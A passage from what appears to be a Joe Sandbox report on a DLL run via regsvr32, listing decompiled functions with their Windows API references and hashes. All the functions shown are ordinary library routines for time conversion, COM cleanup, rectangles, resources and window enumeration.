Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21

Uniqueness

Uniqueness Score: -1.00%

Function 10026A96 Relevance: 6.1, APIs: 4, Instructions: 67
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v44;
				void* __ebp;
				int _t23;
				int _t26;
				int _t29;
				int _t31;
				void* _t40;
				void* _t56;
				void* _t59;

				_t47 = __edx;
				_t40 = __ecx;
				_t56 = _t59;
				if(_a8 != 0) {
					_t52 = _a4;
					_v28.wYear = E10010297(__eflags);
					_v28.wMonth = E100102AE(__eflags);
					_t23 = E100134E7(_a4, __edx, _a4);
					__eflags = _t23;
					if(__eflags == 0) {
						_v28.wDay = 0;
					} else {
						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
					}
					_v28.wHour = E100102C1(__eflags);
					_v28.wMinute = E100102D4(__eflags);
					_t26 = E100134E7(_t52, _t47, _t52);
					__eflags = _t26;
					if(_t26 == 0) {
						_t14 =  &(_v28.wSecond);
						 *_t14 = _v28.wSecond | 0x0000ffff;
						__eflags =  *_t14;
					} else {
						_v28.wSecond =  *_t26;
					}
					_v28.wMilliseconds = 0;
					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
					__eflags = _t29;
					if(_t29 == 0) {
						E100271C6(_t56, GetLastError(), 0);
					}
					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
					__eflags = _t31;
					if(_t31 == 0) {
						_t31 = E100271C6(_t56, GetLastError(), 0);
					}
					return _t31;
				} else {
					_push(_t56);
					_push(__ecx);
					_v44 = 0x1004d548;
					E10011C0F( &_v44, 0x10045e48);
					asm("int3");
					return  *((intOrPtr*)(_t40 + 0x70));
				}
			}

0x10026a96
0x10026a96
0x10026a97
0x10026aa3
0x10026aaa
0x10026ab6
0x10026ac0
0x10026ac4
0x10026ac9
0x10026acc
0x10026ad8
0x10026ace
0x10026ad2
0x10026ad2
0x10026ae5
0x10026aef
0x10026af3
0x10026af8
0x10026afb
0x10026b06
0x10026b06
0x10026b06
0x10026afd
0x10026b00
0x10026b00
0x10026b14
0x10026b18
0x10026b1e
0x10026b26
0x10026b2c
0x10026b2c
0x10026b38
0x10026b3e
0x10026b40
0x10026b46
0x10026b46
0x10026b4e
0x10026aa5
0x1001ce6f
0x1001ce72
0x1001ce7c
0x1001ce83
0x1001ce88
0x1001ce8c
0x1001ce8c

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
GetLastError.KERNEL32(00000000), ref: 10026B29
LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
GetLastError.KERNEL32(00000000), ref: 10026B43

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0B9 Relevance: 6.1, APIs: 4, Instructions: 66
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D03C( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000C8E6( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}

0x1000d0bd
0x1000d0c2
0x1000d15d
0x1000d15d
0x1000d0c9
0x1000d0cf
0x1000d0e3
0x1000d0e3
0x1000d0e6
0x1000d137
0x1000d13d
0x1000d13d
0x1000d140
0x1000d143
0x1000d154
0x1000d154
0x00000000
0x1000d15a
0x1000d0e8
0x1000d0e8
0x1000d0e9
0x1000d127
0x1000d127
0x1000d129
0x1000d12b
0x00000000
0x00000000
0x1000d130
0x00000000
0x1000d130
0x1000d0eb
0x1000d0eb
0x1000d0ee
0x1000d11f
0x00000000
0x1000d11f
0x1000d0f0
0x1000d0f0
0x1000d0f1
0x00000000
0x00000000
0x1000d0f3
0x1000d0f3
0x1000d0f6
0x1000d0fe
0x1000d103
0x1000d106
0x1000d108
0x1000d111
0x1000d111
0x1000d117
0x1000d117
0x00000000
0x1000d0f6
0x1000d0d1
0x1000d0d5
0x00000000
0x00000000
0x1000d0d8
0x00000000

APIs

SafeArrayDestroy.OLEAUT32 ref: 1000D0D8
CoTaskMemFree.OLE32(?), ref: 1000D154

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000C037 Relevance: 6.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E1000C037(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E10011BF0(0x1003aec3, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x10040668;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E1002934F();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E1000B505( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1003eb6c;
				E100293B4(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}

0x1000c03c
0x1000c048
0x1000c04b
0x1000c055
0x1000c058
0x1000c05b
0x1000c06c
0x1000c074
0x1000c07d
0x1000c092
0x1000c0a0
0x1000c0a8
0x1000c0ab
0x1000c0c1
0x1000c0c2
0x1000c0c7
0x1000c0ad
0x1000c0b4
0x1000c0b4
0x1000c05d
0x1000c067
0x1000c067
0x1000c0ca
0x1000c0d1
0x1000c0d8
0x1000c0e4
0x1000c0ec

APIs

__EH_prolog.LIBCMT ref: 1000C03C
GetRgnBox.GDI32(?,?), ref: 1000C07D
IntersectRect.USER32 ref: 1000C092
EqualRect.USER32 ref: 1000C0A0

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$EqualH_prologIntersect
String ID:
API String ID: 2227276553-0
Opcode ID: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
Instruction ID: 4a10622ef6c9ad6aa885a1ca4e3b79ad8472db7afe28fedb0a7e7fe58967940e
Opcode Fuzzy Hash: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
Instruction Fuzzy Hash: 19210B7290025DEFDB11DFA4C984D9EBBB8FF08291B11466AF906E7250D731AE11CF61

Uniqueness

Uniqueness Score: -1.00%

Function 100306DB Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t35;
				int _t39;
				void* _t49;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t39, _t21);
				OffsetRect(_t49 + 0x48, _t39, _v8);
				OffsetRect(_t49 + 0x38, _t39, _v8);
				OffsetRect(_t49 + 0x58, _t39, _v8);
				_t51 =  *((intOrPtr*)(_t49 + 0x80));
				 *((intOrPtr*)(_t49 + 4)) = _a4;
				 *((intOrPtr*)(_t49 + 8)) = _a8;
				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
					_t35 = E100301DC();
				} else {
					_t35 = 0;
				}
				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
				return E10030582(_t49, _t51, 0);
			}

0x100306de
0x100306df
0x100306e5
0x100306ed
0x100306f9
0x100306fc
0x10030704
0x1003070f
0x1003071a
0x10030725
0x10030727
0x10030731
0x10030737
0x1003073a
0x10030742
0x1003073c
0x1003073c
0x1003073c
0x1003074b
0x10030757

APIs

OffsetRect.USER32(?,?,?), ref: 10030704
OffsetRect.USER32(?,?,?), ref: 1003070F
OffsetRect.USER32(?,?,?), ref: 1003071A
OffsetRect.USER32(?,?,?), ref: 10030725

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001EFFC Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001EFFC(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E100373B5() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x1001efff
0x1001f003
0x1001f00c
0x1001f00f
0x1001f012
0x1001f019
0x1001f030
0x1001f030
0x1001f037
0x1001f042
0x1001f042
0x1001f046
0x1001f049
0x1001f051
0x1001f053
0x1001f062
0x1001f066
0x1001f055
0x1001f055
0x1001f058
0x1001f05c
0x1001f05c
0x1001f06f
0x1001f07b
0x1001f07b
0x1001f06f
0x1001f081
0x1001f086
0x1001f086
0x1001f092

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
LoadResource.KERNEL32(?,00000000), ref: 1001F02A
LockResource.KERNEL32(00000000), ref: 1001F03C
FreeResource.KERNEL32(00000000), ref: 1001F086

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100257A8 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E100257A8(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t9;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t35;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E1001F77E(0x10);
				_t36 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10025742(_t9, _t36, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

0x100257a8
0x100257ab
0x100257b0
0x100257b2
0x100257b7
0x100257ba
0x100257c9
0x100257c9
0x100257bc
0x100257c5
0x100257c5
0x100257cb
0x100257dc
0x100257ee
0x100257f2
0x100257fa
0x100257fa
0x10025807
0x10025807
0x1002580f
0x10025815
0x1002581d

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
DuplicateHandle.KERNEL32(00000000), ref: 100257E5
GetLastError.KERNEL32(?), ref: 10025800

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D8A6 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t20 = GetParent(_t24);
					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t21 = E10029C98(_t24, _v12.x, _v12.y);
						if(_t21 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t21);
							_t9 = _t21;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t20;
					}
				}
				return _t9;
			}

0x1001d8ab
0x1001d8b1
0x1001d8b4
0x1001d8b7
0x1001d8ba
0x1001d8bd
0x1001d8c3
0x1001d8c7
0x1001d8d1
0x1001d8d5
0x1001d8ec
0x1001d8fe
0x1001d902
0x1001d911
0x1001d911
0x1001d904
0x1001d905
0x1001d90d
0x1001d90f
0x00000000
0x00000000
0x1001d90f
0x1001d8e3
0x1001d8e3
0x1001d8e3
0x1001d913
0x1001d916

APIs

WindowFromPoint.USER32(?,?), ref: 1001D8BD
GetParent.USER32(00000000), ref: 1001D8CB
ScreenToClient.USER32 ref: 1001D8EC
IsWindowEnabled.USER32(00000000), ref: 1001D905

Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10022B16 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10022115();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E1002283F();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}

0x10022b24
0x10022b87
0x10022b87
0x10022b8b
0x00000000
0x00000000
0x10022b2c
0x10022b56
0x10022b2e
0x10022b2e
0x10022b2f
0x10022b36
0x10022b38
0x10022b3b
0x10022b3e
0x10022b41
0x10022b44
0x10022b45
0x10022b45
0x10022b36
0x10022b60
0x10022b79
0x10022b79
0x10022b81
0x10022b81
0x10022b90

APIs

GetTopWindow.USER32(?), ref: 10022B24
GetTopWindow.USER32(00000000), ref: 10022B63
GetWindow.USER32(00000000,00000002), ref: 10022B81

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10022422 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t13;
				struct HWND__* _t15;
				struct HWND__* _t16;
				void* _t17;

				_t13 = __ecx;
				_t15 = GetDlgItem(_a4, _a8);
				if(_t15 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t16 = _t10;
						if(_t16 == 0) {
							goto L10;
						}
						_t10 = E10022422(_t13, _t16, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t16, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t15) == 0) {
						L3:
						_push(_t15);
						if(_a12 == 0) {
							return E100220EE(_t17);
						}
						_t10 = E10022115();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10022422(_t13, _t15, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x10022422
0x10022439
0x1002243d
0x1002246d
0x10022470
0x1002248d
0x1002248d
0x10022491
0x00000000
0x00000000
0x1002247b
0x10022482
0x10022487
0x00000000
0x10022487
0x00000000
0x10022482
0x1002243f
0x10022444
0x10022456
0x1002245a
0x1002245b
0x00000000
0x1002245d
0x10022464
0x1002246b
0x00000000
0x00000000
0x10022446
0x1002244d
0x10022454
0x00000000
0x00000000
0x10022454
0x10022444
0x10022496
0x10022496

APIs

GetDlgItem.USER32 ref: 1002242D
GetTopWindow.USER32(00000000), ref: 10022440

Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487

GetTopWindow.USER32(?), ref: 10022470

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691

Uniqueness

Uniqueness Score: -1.00%

Function 1002B47F Relevance: 6.0, APIs: 4, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

